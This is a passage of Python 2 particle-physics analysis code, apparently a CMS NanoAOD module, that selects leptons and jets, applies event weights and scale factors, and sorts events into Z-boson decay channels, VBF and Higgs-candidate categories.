if event.genWeight < 0 else 1.\n self.PUWeight = self.puTool.getWeight(event.Pileup_nTrueInt)\n self.EventWeight *= self.GenWeight\n self.EventWeight *= self.PUWeight\n for i,weight in enumerate(event.LHEScaleWeight):\n self.out.LHEScaleWeight_hist.Fill(i,weight)\n for j,weight in enumerate(event.LHEPdfWeight):\n self.out.LHEPdfWeight_hist.Fill(j,weight)\n self.LHEScaleWeight = event.LHEScaleWeight\n self.LHEPdfWeight = event.LHEPdfWeight\n self.LHEWeight_originalXWGTUP = event.LHEWeight_originalXWGTUP\n self.out.events.Fill(0.,self.GenWeight)\n self.out.original.Fill(0.,event.LHEWeight_originalXWGTUP)\n if self.year == 2016 or self.year == 2017:\n self.PrefireWeight = event.PrefireWeight\n self.PrefireWeightUp = event.PrefireWeight_Up\n self.PrefireWeightDown = event.PrefireWeight_Down\n \n if self.isData and event.PV_npvs == 0:\n return False\n if not self.isData:\n self.out.pileup.Fill(event.Pileup_nTrueInt)\n if event.Pileup_nTrueInt == 0:\n return False\n ########### FatJet #########\n for ifatjet in range(event.nFatJet):\n fatjet_pt = event.FatJet_pt[ifatjet]\n fatjet_eta = event.FatJet_eta[ifatjet]\n fatjet_phi = event.FatJet_phi[ifatjet]\n fatjet_mass = event.FatJet_mass[ifatjet]\n fatjet_jetid = event.FatJet_jetId[ifatjet]\n fatjet_tlv = ROOT.TLorentzVector()\n fatjet_tlv.SetPtEtaPhiM(fatjet_pt, fatjet_eta, fatjet_phi, fatjet_mass)\n if fatjet_pt > fatjet_pt_cut and abs(fatjet_eta) < fatjet_eta_cut:\n fatjet_tlv_list.append(fatjet_tlv)\n idx_fatjet.append(ifatjet)\n if event.FatJet_tau1[ifatjet]==0:\n fatjet_tau21_list.append(0)\n fatjet_tau41_list.append(0)\n fatjet_tau31_list.append(0)\n else:\n fatjet_tau21_list.append(event.FatJet_tau2[ifatjet]/event.FatJet_tau1[ifatjet])\n fatjet_tau41_list.append(event.FatJet_tau4[ifatjet]/event.FatJet_tau1[ifatjet])\n fatjet_tau31_list.append(event.FatJet_tau3[ifatjet]/event.FatJet_tau1[ifatjet])\n if event.FatJet_tau2[ifatjet]==0:\n fatjet_tau42_list.append(0)\n fatjet_tau32_list.append(0)\n else:\n fatjet_tau42_list.append(event.FatJet_tau4[ifatjet]/event.FatJet_tau2[ifatjet])\n fatjet_tau32_list.append(event.FatJet_tau3[ifatjet]/event.FatJet_tau2[ifatjet])\n self.nFatJets = len(fatjet_tlv_list)\n #stop if no suitable Fatjet\n if len(fatjet_tlv_list) == 0:\n return False \n ########### electrons ##########\n for ielectron in range(event.nElectron):\n electron_pt = event.Electron_pt[ielectron]\n electron_eta = event.Electron_eta[ielectron]\n electron_phi = event.Electron_phi[ielectron]\n electron_mass = event.Electron_mass[ielectron]\n electron_tlv = ROOT.TLorentzVector()\n electron_tlv.SetPtEtaPhiM(electron_pt,electron_eta,electron_phi,electron_mass)\n if electron_eta > -2.5 and electron_eta < -1.479 and electron_phi > -1.55 and electron_phi < -0.9:\n if self.Ele_HEM15_16 == -1.:\n self.Ele_HEM15_16 = 0.\n self.Ele_HEM15_16 += electron_pt\n if electron_pt > elec_pt_cut and abs(electron_eta) < elec_eta_cut:\n idx_electrons.append(ielectron)\n electrons_tlv_list.append(electron_tlv)\n if event.Electron_cutBased[ielectron] >= 2:\n idx_loose_electrons.append(ielectron)\n loose_electrons_tlv_list.append(electron_tlv)\n self.nElectrons = len(loose_electrons_tlv_list)\n \n ########### muons #########\n for imuon in range(event.nMuon):\n muon_pt = event.Muon_pt[imuon]\n muon_eta = event.Muon_eta[imuon]\n muon_phi = event.Muon_phi[imuon]\n muon_mass = event.Muon_mass[imuon]\n muon_tlv = ROOT.TLorentzVector()\n muon_tlv.SetPtEtaPhiM(muon_pt, muon_eta, muon_phi, muon_mass)\n if muon_pt > muon_pt_cut and abs(muon_eta) < muon_eta_cut:\n 
idx_muons.append(imuon)\n muons_tlv_list.append(muon_tlv)\n if event.Muon_isPFcand[imuon] and struct.unpack('B',event.Muon_pfIsoId[imuon])[0]>=2 and (event.Muon_isGlobal[imuon] or event.Muon_isTracker[imuon]):\n idx_loose_muons.append(imuon)\n loose_muons_tlv_list.append(muon_tlv)\n self.nMuons = len(loose_muons_tlv_list)\n\n\n ############ taus #########\n for itau in range(event.nTau):\n tau_pt = event.Tau_pt[itau]\n tau_eta = event.Tau_eta[itau]\n tau_phi = event.Tau_phi[itau]\n tau_mass = event.Tau_mass[itau]\n tau_tlv = ROOT.TLorentzVector()\n tau_tlv.SetPtEtaPhiM(tau_pt, tau_eta, tau_phi, tau_mass)\n if tau_pt > tau_pt_cut and abs(tau_eta) < tau_eta_cut:\n cleanTau = True\n for loose_electrons_tlv in loose_electrons_tlv_list:\n if loose_electrons_tlv.DeltaR(tau_tlv) < 0.4:\n cleanTau = False\n for loose_muons_tlv in loose_muons_tlv_list:\n if loose_muons_tlv.DeltaR(tau_tlv) < 0.4:\n cleanTau = False\n if cleanTau:\n self.nTaus += 1\n\n ############ MET ##########\n METx = 0.\n METy = 0.\n MET_tlv = ROOT.TLorentzVector()\n MET_tlv.SetPtEtaPhiE(event.PuppiMET_pt,0.,event.PuppiMET_phi, event.PuppiMET_pt)\n \n ############ TTbar pT reweighting ########\n if self.isMC and 'TT' in self.sample[0]:\n Top1_pt, Top2_pt = getTTPt(event)\n self.TopWeight = getTTptWeight(Top1_pt, Top2_pt)\n\n ############ ZtoEE ############\n self.out.eecutflow.Fill(0.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n maxZpt = -1.\n Z_pt = -1.\n Z_m = -1.\n goodelectronpair = False\n for i in idx_electrons:\n for j in idx_electrons:\n if i==j or event.Electron_charge[i] == event.Electron_charge[j]:\n continue\n eli_tlv = ROOT.TLorentzVector()\n eli_tlv.SetPtEtaPhiM(event.Electron_pt[i],event.Electron_eta[i],event.Electron_phi[i],event.Electron_mass[i])\n eli_v = ROOT.TVector3()\n eli_v.SetPtEtaPhi(event.Electron_pt[i],event.Electron_eta[i],event.Electron_phi[i])\n elj_tlv = ROOT.TLorentzVector()\n elj_tlv.SetPtEtaPhiM(event.Electron_pt[j],event.Electron_eta[j],event.Electron_phi[j],event.Electron_mass[j])\n elj_v = ROOT.TVector3()\n elj_v.SetPtEtaPhi(event.Electron_pt[j],event.Electron_eta[j],event.Electron_phi[j])\n diel = eli_tlv + elj_tlv\n Z_pt = diel.Pt()\n Z_m = diel.M()\n if Z_m > 70. and Z_m < 110. 
and Z_pt > maxZpt:\n maxZpt = Z_pt\n if eli_tlv.Pt() > elj_tlv.Pt():\n el1 = i\n el2 = j\n el1_tlv = eli_tlv\n el2_tlv = elj_tlv\n el1_v = eli_v\n el2_v = elj_v\n else:\n el1 = j\n el2 = i\n el1_tlv = elj_tlv\n el2_tlv = eli_tlv\n el1_v = elj_v\n el2_v = eli_v\n goodelectronpair = True\n \n \n if goodelectronpair:\n self.out.eecutflow.Fill(1.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if el1_tlv.Pt() > elec1_pt_cut and el2_tlv.Pt() > elec2_pt_cut:\n self.out.eecutflow.Fill(2.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if event.Electron_cutBased[el1] >= 2 and event.Electron_cutBased[el2] >= 2:\n self.out.eecutflow.Fill(3.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if maxZpt > v_pt_cut:\n self.out.eecutflow.Fill(4.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if trigger_SingleEle == None:\n if not trigger_SingleIsoEle and not trigger_SinglePhoton:\n print \"ZtoEE trigger inconsistency\"\n return False\n else:\n if not trigger_SingleEle and not trigger_SingleIsoEle and not trigger_SinglePhoton:\n print \"ZtoEE trigger inconsistency\"\n return False\n #if not self.isMC and (\"SinglePhoton\" in self.sample[0] and (trigger_SingleEle or trigger_SingleIsoEle)):\n # print \"ZtoEE double counting\"\n # return False\n self.out.eecutflow.Fill(5.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if self.isMC:\n eltrig_tlv = el1_tlv\n #for i in range(event.nTrigObj):\n # if event.TrigObj_id[i] ==11:\n # trigobj_v = ROOT.TVector3()\n # trigobj_v.SetPtEtaPhi(event.TrigObj_pt[i],event.TrigObj_eta[i],event.TrigObj_phi[i])\n # print \"electron TrigObj_filterBits:\",event.TrigObj_filterBits[i]\n # if event.TrigObj_filterBits[i]==14336:\n # #if event.TrigObj_filterBits[i]==1110000000000000:\n # print \"found matching electron\"\n # deltaR1 = trigobj_v.DeltaR(el1_v)\n # deltaR2 = trigobj_v.DeltaR(el2_v)\n # if deltaR2 < deltaR1 and deltaR2 < 0.2:\n # eltrig_tlv = el2_tlv\n # break\n self.TriggerWeight = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta())\n self.TriggerWeightUp = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta()) + self.elSFs.getTriggerSFerror(eltrig_tlv.Pt(),eltrig_tlv.Eta())\n self.TriggerWeightDown = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta()) - self.elSFs.getTriggerSFerror(eltrig_tlv.Pt(),eltrig_tlv.Eta())\n self.LeptonWeight = self.elSFs.getIdIsoSF(el1_tlv.Pt(), el1_tlv.Eta())*self.elSFs.getIdIsoSF(el2_tlv.Pt(),el2_tlv.Eta())\n IdIsoSF1 = self.elSFs.getIdIsoSF(el1_tlv.Pt(), el1_tlv.Eta())\n IdIsoSF2 = self.elSFs.getIdIsoSF(el2_tlv.Pt(),el2_tlv.Eta())\n IdIsoSF1error = self.elSFs.getIdIsoSFerror(el1_tlv.Pt(), el1_tlv.Eta())\n IdIsoSF2error = self.elSFs.getIdIsoSFerror(el2_tlv.Pt(),el2_tlv.Eta())\n \n self.LeptonWeight = IdIsoSF1*IdIsoSF2\n LeptonWeightsigma = np.sqrt((IdIsoSF1error*IdIsoSF2)**2+(IdIsoSF2error*IdIsoSF1)**2)\n self.LeptonWeightUp = self.LeptonWeight + LeptonWeightsigma\n self.LeptonWeightDown = self.LeptonWeight - LeptonWeightsigma\n if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:\n GenVpt = getGenVpt(event)\n self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)\n self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)\n self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)\n self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr\n self.EventWeight *= self.TriggerWeight\n self.EventWeight *= self.LeptonWeight\n V = el1_tlv + el2_tlv\n self.Ele1_pt = el1_tlv.Pt()\n self.Ele1_eta = 
el1_tlv.Eta()\n self.Ele1_phi = el1_tlv.Phi()\n self.Ele1_mass = el1_tlv.M()\n self.Ele2_pt = el2_tlv.Pt()\n self.Ele2_eta = el2_tlv.Eta()\n self.Ele2_phi = el2_tlv.Phi()\n self.Ele2_mass = el2_tlv.M()\n self.isZtoEE = True\n\n ########## ZtoMM #############\n self.out.mmcutflow.Fill(0.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n maxZpt = -1.\n Z_pt = -1.\n Z_m = -1.\n goodmuonpair = False\n for i in idx_muons:\n for j in idx_muons:\n if i==j or event.Muon_charge[i] == event.Muon_charge[j]:\n continue\n mui_tlv = ROOT.TLorentzVector()\n mui_tlv.SetPtEtaPhiM(event.Muon_pt[i],event.Muon_eta[i],event.Muon_phi[i],event.Muon_mass[i])\n mui_v = ROOT.TVector3()\n mui_v.SetPtEtaPhi(event.Muon_pt[i],event.Muon_eta[i],event.Muon_phi[i])\n muj_tlv = ROOT.TLorentzVector()\n muj_tlv.SetPtEtaPhiM(event.Muon_pt[j],event.Muon_eta[j],event.Muon_phi[j],event.Muon_mass[j]) \n muj_v = ROOT.TVector3()\n muj_v.SetPtEtaPhi(event.Muon_pt[j],event.Muon_eta[j],event.Muon_phi[j])\n dimu = mui_tlv + muj_tlv\n Z_pt = dimu.Pt()\n Z_m = dimu.M()\n if Z_m > 70. and Z_m < 110. and Z_pt > maxZpt:\n maxZpt = Z_pt\n if mui_tlv.Pt() > muj_tlv.Pt():\n mu1 = i\n mu2 = j\n mu1_tlv = mui_tlv\n mu2_tlv = muj_tlv\n mu1_v = mui_v\n mu2_v = muj_v\n else:\n mu1 = j\n mu2 = i\n mu1_tlv = muj_tlv\n mu2_tlv = mui_tlv\n mu1_v = muj_v\n mu2_v = mui_v\n goodmuonpair = True\n \n\n if goodmuonpair:\n self.out.mmcutflow.Fill(1.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n mu1_highPtId = struct.unpack('B',event.Muon_highPtId[mu1])[0]\n mu2_highPtId = struct.unpack('B',event.Muon_highPtId[mu2])[0] \n if mu1_tlv.Pt() > muon1_pt_cut and mu2_tlv.Pt() > muon2_pt_cut:\n self.out.mmcutflow.Fill(2.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n if (mu1_highPtId >= 2 and mu2_highPtId >= 1) or (mu1_highPtId >= 1 and mu2_highPtId >= 2):\n self.out.mmcutflow.Fill(3.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n if maxZpt > v_pt_cut:\n self.out.mmcutflow.Fill(4.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n if not trigger_SingleMu:\n print \"ZtoMM trigger inconsistency\"\n return False\n self.out.mmcutflow.Fill(5.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n if self.isMC:\n if mu1_highPtId >=2:\n mutrig_tlv = mu1_tlv\n else:\n mutrig_tlv = mu2_tlv\n #for i in range(event.nTrigObj):\n # if event.TrigObj_id[i] ==13:\n # trigobj_v = ROOT.TVector3()\n # trigobj_v.SetPtEtaPhi(event.TrigObj_pt[i],event.TrigObj_eta[i],event.TrigObj_phi[i])\n # deltaR1 = trigobj_v.DeltaR(mu1_v)\n # deltaR2 = trigobj_v.DeltaR(mu2_v)\n # print \"muon TrigObj_filterBits:\",event.TrigObj_filterBits[i]\n # if event.TrigObj_filterBits[i]==2048:\n # #if event.TrigObj_filterBits[i]==10000000000:\n # print \"found matching muon\"\n # if deltaR2 < deltaR1 and deltaR2 < 0.2:\n # mutrig_tlv = mu2_tlv\n # break\n\n self.TriggerWeight = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta())\n self.TriggerWeightUp = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta()) + self.muSFs.getTriggerSFerror(mutrig_tlv.Pt(),mutrig_tlv.Eta())\n self.TriggerWeightDown = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta()) - self.muSFs.getTriggerSFerror(mutrig_tlv.Pt(),mutrig_tlv.Eta())\n IdSF1 = self.muSFs.getIdSF(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)\n IdSF2 = self.muSFs.getIdSF(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)\n IsoSF1 = self.muSFs.getIsoSF(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)\n IsoSF2 = self.muSFs.getIsoSF(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)\n IdSF1error = 
self.muSFs.getIdSFerror(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)\n IdSF2error = self.muSFs.getIdSFerror(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)\n IsoSF1error = self.muSFs.getIsoSFerror(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)\n IsoSF2error = self.muSFs.getIsoSFerror(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)\n self.LeptonWeight = IdSF1*IdSF2*IsoSF1*IsoSF2\n LeptonWeightsigma = np.sqrt((IdSF1error*IdSF2*IsoSF1*IsoSF2)**2+(IdSF2error*IdSF1*IsoSF1*IsoSF2)**2+(IsoSF1error*IdSF1*IdSF2*IsoSF2)**2+(IsoSF2error*IdSF1*IdSF2*IsoSF1)**2)\n self.LeptonWeightUp = self.LeptonWeight + LeptonWeightsigma\n self.LeptonWeightDown = self.LeptonWeight - LeptonWeightsigma\n if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:\n GenVpt = getGenVpt(event)\n self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)\n self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)\n self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)\n self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr\n self.EventWeight *= self.TriggerWeight\n self.EventWeight *= self.LeptonWeight\n if mu1_tlv.DeltaR(mu2_tlv) < 0.3:\n try:\n self.Mu1_relIso = ((event.Muon_tkRelIso[mu1]*mu1_tlv.Pt()) - mu2_tlv.Pt())/mu1_tlv.Pt()\n self.Mu2_relIso = ((event.Muon_tkRelIso[mu2]*mu2_tlv.Pt()) - mu1_tlv.Pt())/mu2_tlv.Pt()\n except:\n self.Mu1_relIso = -1.\n self.Mu2_relIso = -1.\n else:\n try:\n self.Mu1_relIso = event.Muon_tkRelIso[mu1]\n self.Mu2_relIso = event.Muon_tkRelIso[mu2]\n except:\n self.Mu1_relIso = -1.\n self.Mu2_relIso = -1.\n V = mu1_tlv + mu2_tlv\n self.Mu1_pt = mu1_tlv.Pt()\n self.Mu1_eta = mu1_tlv.Eta()\n self.Mu1_phi = mu1_tlv.Phi()\n self.Mu1_mass = mu1_tlv.M()\n self.Mu1_pfIsoId = struct.unpack('B',event.Muon_pfIsoId[mu1])[0]\n self.Mu1_highPtId = struct.unpack('B',event.Muon_highPtId[mu1])[0]\n self.Mu2_pt = mu2_tlv.Pt()\n self.Mu2_eta = mu2_tlv.Eta()\n self.Mu2_phi = mu2_tlv.Phi()\n self.Mu2_mass = mu2_tlv.M()\n self.Mu2_pfIsoId = struct.unpack('B',event.Muon_pfIsoId[mu2])[0]\n self.Mu2_highPtId = struct.unpack('B',event.Muon_highPtId[mu2])[0]\n self.isZtoMM = True\n\n \n ########### TtoEM ######### \n if not self.isZtoMM and not self.isZtoEE and self.nElectrons == 1 and self.nMuons == 1:\n if event.Electron_charge[idx_loose_electrons[0]] != event.Muon_charge[idx_loose_muons[0]]:\n el_tlv = loose_electrons_tlv_list[0]\n mu_tlv = loose_muons_tlv_list[0]\n if mu_tlv.Pt() > 30. 
and el_tlv.Pt() > 30.: \n V = mu_tlv + el_tlv\n if V.Pt() > 50.:\n if trigger_SingleEle == None:\n if not trigger_SingleIsoEle:\n print \"TtoEM trigger inconsistency\"\n return False\n else:\n if not trigger_SingleEle and not trigger_SingleIsoEle:\n print \"TtoEM trigger inconsistency\"\n return False\n if self.isMC:\n self.TriggerWeight = self.elSFs.getTriggerSF(el_tlv.Pt(),el_tlv.Eta())\n self.LeptonWeight = self.elSFs.getIdIsoSF(el_tlv.Pt(), el_tlv.Eta())\n if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:\n GenVpt = getGenVpt(event)\n self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)\n self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)\n self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)\n self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr\n self.EventWeight *= self.TriggerWeight\n self.EventWeight *= self.LeptonWeight\n self.Mu1_pt = mu_tlv.Pt()\n self.Mu1_eta = mu_tlv.Eta()\n self.Mu1_phi = mu_tlv.Phi()\n self.Mu1_mass = mu_tlv.M()\n self.Ele1_pt = el_tlv.Pt()\n self.Ele1_eta = el_tlv.Eta()\n self.Ele1_phi = el_tlv.Phi()\n self.Ele1_mass = el_tlv.M()\n self.isTtoEM = True\n\n ######### ZtoNN ##########\n self.out.nncutflow.Fill(0.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n if not self.isZtoMM and not self.isZtoEE and not self.isTtoEM:\n if event.PuppiMET_pt > met_pt_cut :\n self.out.nncutflow.Fill(1.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n if self.nElectrons == 0 and self.nMuons == 0 and self.nTaus == 0:\n self.out.nncutflow.Fill(2.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n V.SetPtEtaPhiE(event.PuppiMET_pt,0.,event.PuppiMET_phi,event.PuppiMET_pt)\n V_chs.SetPtEtaPhiE(event.MET_pt,0.,event.MET_phi,event.MET_pt)\n if trigger_MET == None:\n if not self.isMC and not trigger_METMHT and not trigger_METMHTNoMu:\n print \"ZtoNN Trigger inconsistency\"\n return False\n else:\n if not self.isMC and not trigger_MET and not trigger_METMHT and not trigger_METMHTNoMu:\n print \"ZtoNN Trigger inconsistency\"\n return False\n self.out.nncutflow.Fill(3.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n if self.filter(event) == False:\n print \"Bad event\"\n return False\n self.out.nncutflow.Fill(4.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n if self.isMC:\n if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:\n GenVpt = getGenVpt(event)\n self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)\n self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)\n self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)\n self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr\n self.TriggerWeight = 1.\n self.isZtoNN = True\n #stop if no semileptonic decays\n if self.isZtoEE==False and self.isZtoMM==False and self.isZtoNN==False and self.isTtoEM==False:\n return False\n ########## setting the Higgs and V index #######\n fatjet_idx_H = 0\n valid_Higgs = False\n if self.isZtoMM:\n fatjet_maxpt = 0.\n for i,fatjet_tlv in enumerate(fatjet_tlv_list):\n if fatjet_tlv.DeltaR(mu1_tlv)>0.8 and fatjet_tlv.DeltaR(mu2_tlv)>0.8 and fatjet_tlv.Pt()>fatjet_maxpt:\n fatjet_maxpt=fatjet_tlv.Pt()\n fatjet_idx_H = i\n valid_Higgs = True\n if not valid_Higgs:\n return False\n\n elif self.isZtoEE:\n fatjet_maxpt = 0.\n for i,fatjet_tlv in enumerate(fatjet_tlv_list):\n if fatjet_tlv.DeltaR(el1_tlv)>0.8 and fatjet_tlv.DeltaR(el2_tlv)>0.8 and fatjet_tlv.Pt()>fatjet_maxpt:\n 
fatjet_maxpt=fatjet_tlv.Pt()\n fatjet_idx_H = i\n valid_Higgs = True\n if not valid_Higgs:\n return False\n \n elif self.isZtoNN:\n fatjet_maxpt = 0.\n for i,fatjet_tlv in enumerate(fatjet_tlv_list):\n if fatjet_tlv.Pt()>fatjet_maxpt:\n fatjet_maxpt=fatjet_tlv.Pt()\n fatjet_idx_H = i\n\n ############ AK4 Jet ###########\n for ijet in range(event.nJet):\n jet_pt = event.Jet_pt[ijet]\n jet_eta = event.Jet_eta[ijet]\n jet_phi = event.Jet_phi[ijet]\n jet_mass = event.Jet_mass[ijet]\n jet_tlv = ROOT.TLorentzVector()\n jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)\n self.HT += jet_pt\n if jet_eta > -2.5 and jet_eta < -1.479 and jet_phi > -1.55 and jet_phi < -0.9:\n if self.HT_HEM15_16 == -1.:\n self.HT_HEM15_16 = 0.\n self.HT_HEM15_16 += jet_pt\n if jet_pt > ak4_pt_cut and abs(jet_eta) < ak4_eta_cut:\n cleanJet = True\n for loose_electrons_tlv in loose_electrons_tlv_list:\n if loose_electrons_tlv.DeltaR(jet_tlv) < 0.4:\n cleanJet = False\n for loose_muons_tlv in loose_muons_tlv_list:\n if loose_muons_tlv.DeltaR(jet_tlv) < 0.4:\n cleanJet = False\n if cleanJet and getJetID(self.year,event,ijet):\n if len(fatjet_tlv_list) > 0 and fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv) > 1.2:\n jet_tlv_list.append(jet_tlv)\n idx_jet.append(ijet)\n\n ############ AK4 Jet check for VBF ###########\n if self.isZtoMM:\n lep1_tlv = mu1_tlv\n lep2_tlv = mu2_tlv\n if self.isZtoEE:\n lep1_tlv = el1_tlv\n lep2_tlv = el2_tlv\n \n for ijet in range(event.nJet):\n jet_pt = event.Jet_pt[ijet]\n jet_eta = event.Jet_eta[ijet]\n jet_phi = event.Jet_phi[ijet]\n jet_mass = event.Jet_mass[ijet]\n jet_tlv = ROOT.TLorentzVector()\n jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)\n if abs(jet_eta) < 5.0:\n if len(fatjet_tlv_list) > 0:\n if fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv) > 1.2:\n if getJetID(self.year,event,ijet) and event.Jet_puId[ijet]==7:\n if self.isZtoMM or self.isZtoEE:\n if jet_tlv.DeltaR(lep1_tlv)>0.4 and jet_tlv.DeltaR(lep2_tlv)>0.4:\n jet_tlv_list_vbf.append(jet_tlv)\n idx_jet_vbf.append(ijet) \n elif self.isZtoNN:\n jet_tlv_list_vbf.append(jet_tlv)\n idx_jet_vbf.append(ijet) \n\n idx1_vbf = -1\n idx2_vbf = -1\n maxVBFmass = -1.\n for ijet1, jet1_tlv in enumerate(jet_tlv_list_vbf):\n for ijet2, jet2_tlv in enumerate(jet_tlv_list_vbf):\n if ijet1 == ijet2: continue\n eta1 = jet_tlv_list_vbf[ijet1].Eta()\n eta2 = jet_tlv_list_vbf[ijet2].Eta()\n V_VBF = jet_tlv_list_vbf[ijet1]+jet_tlv_list_vbf[ijet2]\n VBFmass = V_VBF.M()\n if abs(eta1-eta2)>4.0 and eta1*eta2<0. 
and VBFmass>maxVBFmass:\n idx1_vbf = ijet1\n idx2_vbf = ijet2\n maxVBFmass = VBFmass\n \n\n self.dijet_VBF_mass = maxVBFmass\n if maxVBFmass > 500.: \n self.isVBF = True\n self.Jet1_VBF_pt = jet_tlv_list_vbf[idx1_vbf].Pt()\n self.Jet1_VBF_eta = jet_tlv_list_vbf[idx1_vbf].Eta()\n self.Jet1_VBF_phi = jet_tlv_list_vbf[idx1_vbf].Phi()\n self.Jet1_VBF_mass = jet_tlv_list_vbf[idx1_vbf].M()\n self.Jet2_VBF_pt = jet_tlv_list_vbf[idx2_vbf].Pt()\n self.Jet2_VBF_eta = jet_tlv_list_vbf[idx2_vbf].Eta()\n self.Jet2_VBF_phi = jet_tlv_list_vbf[idx2_vbf].Phi()\n self.Jet2_VBF_mass = jet_tlv_list_vbf[idx2_vbf].M()\n self.deltaR_VBF = jet_tlv_list_vbf[idx1_vbf].DeltaR(jet_tlv_list_vbf[idx2_vbf])\n self.deltaR_HVBFjet1 = (fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv_list_vbf[idx1_vbf]))\n self.deltaR_HVBFjet2 = (fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv_list_vbf[idx2_vbf]))\n\n ########## Higgs ######## \n H = fatjet_tlv_list[fatjet_idx_H]\n\n if self.runJEC:\n self.H_mass_nom = event.FatJet_msoftdrop_nom[fatjet_idx_H]\n self.H_mass_jmsUp = event.FatJet_msoftdrop_jmsUp[fatjet_idx_H]\n self.H_mass_jmsDown = event.FatJet_msoftdrop_jmsDown[fatjet_idx_H]\n self.H_mass_jmrUp = event.FatJet_msoftdrop_jmrUp[fatjet_idx_H]\n self.H_mass_jmrDown = event.FatJet_msoftdrop_jmrDown[fatjet_idx_H]\n self.H_pt_nom = event.FatJet_pt_nom[fatjet_idx_H]\n self.H_pt_jesUp = event.FatJet_pt_jesTotalUp[fatjet_idx_H]\n self.H_pt_jesDown = event.FatJet_pt_jesTotalDown[fatjet_idx_H]\n self.H_pt_jerUp = event.FatJet_pt_jerUp[fatjet_idx_H]\n self.H_pt_jerDown = event.FatJet_pt_jerDown[fatjet_idx_H]\n self.PuppiMET_pt_nom = event.PuppiMET_pt_nom\n self.PuppiMET_pt_jesUp = event.PuppiMET_pt_jesTotalUp\n self.PuppiMET_pt_jesDown = event.PuppiMET_pt_jesTotalDown\n self.PuppiMET_pt_jerUp = event.PuppiMET_pt_jerUp\n self.PuppiMET_pt_jerDown = event.PuppiMET_pt_jerDown\n \n H_Eta = H.Eta()\n H_Phi = H.Phi()\n H_M = H.M()\n H_nom = ROOT.TLorentzVector()\n H_jesUp = ROOT.TLorentzVector()\n H_jesDown = ROOT.TLorentzVector()\n H_jerUp = ROOT.TLorentzVector()\n H_jerDown = ROOT.TLorentzVector()\n H_nom.SetPtEtaPhiM(self.H_pt_nom,H_Eta,H_Phi,H_M)\n H_jesUp.SetPtEtaPhiM(self.H_pt_jesUp,H_Eta,H_Phi,H_M)\n H_jesDown.SetPtEtaPhiM(self.H_pt_jesDown,H_Eta,H_Phi,H_M)\n H_jerUp.SetPtEtaPhiM(self.H_pt_jerUp,H_Eta,H_Phi,H_M)\n H_jerDown.SetPtEtaPhiM(self.H_pt_jerDown,H_Eta,H_Phi,H_M)\n MET_nom = ROOT.TLorentzVector()\n MET_jesUp = ROOT.TLorentzVector()\n MET_jesDown = ROOT.TLorentzVector()\n MET_jerUp = ROOT.TLorentzVector()\n MET_jerDown = ROOT.TLorentzVector()\n 